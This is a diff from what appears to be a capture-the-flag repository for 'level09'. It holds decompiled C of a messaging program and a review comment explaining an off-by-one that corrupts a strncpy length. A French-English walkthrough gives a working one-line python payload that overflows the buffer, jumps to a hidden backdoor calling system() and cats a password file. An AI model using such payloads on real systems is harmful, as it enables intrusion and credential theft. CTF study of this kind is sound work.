+ undefined8 local_3c;
+ undefined8 local_34;
+ undefined8 local_2c;
+ undefined8 local_24;
+ undefined8 local_1c;
+ undefined4 local_14;
+
+ local_3c = 0;
+ local_34 = 0;
+ local_2c = 0;
+ local_24 = 0;
+ local_1c = 0;
+ local_14 = 0x8c;
+ set_username(local_c8);
+ set_msg(local_c8);
+ puts(">: Msg sent!");
+ return;
+}
+
+
+undefined8 main(void)
+{
+ puts(
+ "--------------------------------------------\n| ~Welcome to l33t-m$n ~ v1337 |\n- -------------------------------------------"
+ );
+ handle_msg();
+ return 0;
+}
diff --git a/level09/walkthrough b/level09/walkthrough
index 7431a9f..39c0e23 100644
--- a/level09/walkthrough
+++ b/level09/walkthrough
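Review bot: set_username copies up to 0x29 bytes into the field at `param_1 + 0x8c`, but handle_msg's frame gives that field only 40 bytes (`local_c8 [140]` ends at 0x8c, the five zeroed 8-byte locals run to 0xb4, and `local_14 = 0x8c` sits at 0xb4), so the 41st username byte overwrites the low byte of the length that set_msg then hands to `strncpy(param_1,(char *)local_408,(long)*(int *)(param_1 + 0xb4));`, which lets a message write far past the end of the 140-byte buffer. The loop bound should be `local_c < 0x28`, and set_msg should not trust an in-object length at all; clamping it to `0x8c` before the strncpy breaks the second half of the chain on its own. The same loop leaves the field unterminated when all 40 bytes are non-NUL, so `printf(">: Welcome, %s",param_1 + 0x8c);` reads on into the length int. secret_backdoor passes a raw fgets line to `system(local_88);`; as this file is decompiled output kept for the walkthrough, a short comment on each of these three lines naming the role it plays would document the level better than the walkthrough's reference to "snprintf" (the code uses strncpy).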
@@ -2,6 +2,9 @@ python -c "print('a'*40+'\xff'+' '*208+'/bin/cat /home/users/end/.pass ;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')" | env -i /home/users/level09/level09 +Avec ghidra on trouve une fonction cache secret backdoor, on va essayer de l'appeler. + +We notice an small breach on the snprintf, the size arguement is writable with the 41th character of the username, we put 0xFF because it is the largest, then we can to a ret to the secret backdoor function which calls system, with spaces and a cat of the last flag it works ! This should win :